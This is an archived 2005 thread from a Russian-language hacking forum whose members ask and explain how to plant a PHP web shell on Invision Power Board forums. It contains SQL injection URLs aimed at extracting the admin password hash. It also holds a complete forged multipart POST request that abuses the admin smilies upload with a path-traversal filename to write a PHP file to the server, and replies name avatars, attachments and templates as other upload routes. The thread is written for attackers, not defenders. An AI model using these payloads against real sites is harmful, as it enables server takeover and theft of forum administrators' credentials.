FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Вопрос про заливку шелла в Invision Power Board

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос про заливку шелла в Invision Power Board

15.02.2005, 16:53

DiNo

Новичок

Регистрация: 19.01.2005

Сообщений: 9

Провел на форуме:
5075

Репутация: 0

Вопрос про заливку шелла в Invision Power Board

как залить remview в Invision Power Board? Я прочитал статью как можно через смайлики но нифига не понял. Что можно сделать? Как можно по другому получить доступ?

16.02.2005, 01:11

DiNo

Новичок

Регистрация: 19.01.2005

Сообщений: 9

Провел на форуме:
5075

Репутация: 0

Ну объясните кто нибудь.

16.02.2005, 01:54

link

Новичок

Регистрация: 15.01.2005

Сообщений: 7

Провел на форуме:
2605

Репутация: 0

ДА блин проверки нет, кидаеш туды файл вместо смайла и все.

16.02.2005, 04:42

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

Провел на форуме:
307649

Репутация: 67

Отправить сообщение для (-=util=-) с помощью ICQ

А где можно феньку со смайлами найти? Чегото я немогу обнаружить.... :\

И вот я пытал ipb 1.3 final но чтото бесполезно =\

http://[target]/forum/index.php?act=Search&nav=lv&CODE=show&searchid=[my_id]&search_in=topics&result_type=topics&hl=&st=20SELE CT password FROM ibf_members WHERE name='mega_admin'/*

и вот ещё

http://[target]/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=SELECT password FROM ibf_members WHERE name='maga_admin'

вот ёлки палки ничего неполучилось... =\
Пытался залить shell в аватары but can't

Последний раз редактировалось (-=util=-); 16.02.2005 в 05:01..

16.02.2005, 11:56

DiNo

Новичок

Регистрация: 19.01.2005

Сообщений: 9

Провел на форуме:
5075

Репутация: 0

Не качается через смайлы я уже пробовал. Папка походу на запись закрыта.

16.02.2005, 12:25

Black_Death

Новичок

Регистрация: 16.11.2004

Сообщений: 29

Провел на форуме:
47488

Репутация: -2

Мля ну другую папку найди...например с аватарами! Про это же несколько статей есть на античате!!!

16.02.2005, 14:50

KEZ

Guest

Сообщений: n/a

Провел на форуме:

Репутация:

Хехехе вы вместо [my_id] и других подставьте значения конкретные )))
Эта SQL injection работает только в 2.x
Шелл залить либо через присоединенный файл, либо через смайлы либо через
темплейты

16.02.2005, 16:07

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

Провел на форуме:
307649

Репутация: 67

нет ну значения то конкретные на форуме были)))
Вот как с смайлами что то непонятно
Смайлы и аватары wget'ом тоже?

16.02.2005, 19:26

DiNo

Новичок

Регистрация: 19.01.2005

Сообщений: 9

Провел на форуме:
5075

Репутация: 0

Вот подделанный запрос из статьи

Код:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Где на моем компе должен лежать remview?
../../uploads/myFile.php
Я прочитал статью но нихрена не получается.

#10

03.03.2005, 13:40

Algol

Регистрация: 29.05.2002

Сообщений: 1,793

Провел на форуме:
2050916

Репутация: 0

Цитата:

Сообщение от DiNo

Где на моем компе должен лежать remview?
../../uploads/myFile.php
Я прочитал статью но нихрена не получается.

../../uploads/myFile.php - это относительный путь к файлу, который будет создан на сервере!

А сам текст пхп-скрипта нужно вставлять вместо этого:
<% echo("Hello from injected PHP script") %>

Эхххх... учите HTTP...

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4	Ice_Fro$T	Уязвимости CMS / форумов	19	18.11.2006 09:19
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.	dukalis(AwP)	Уязвимости CMS / форумов	14	19.04.2006 19:40
Вопрос про восстановление паролей в Invision Power Board	rHoM	Уязвимости CMS / форумов	2	08.12.2004 14:47
Вопрос про уязвимости в Invision power board =>v2.0.0		Уязвимости CMS / форумов	5	27.10.2004 19:59

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ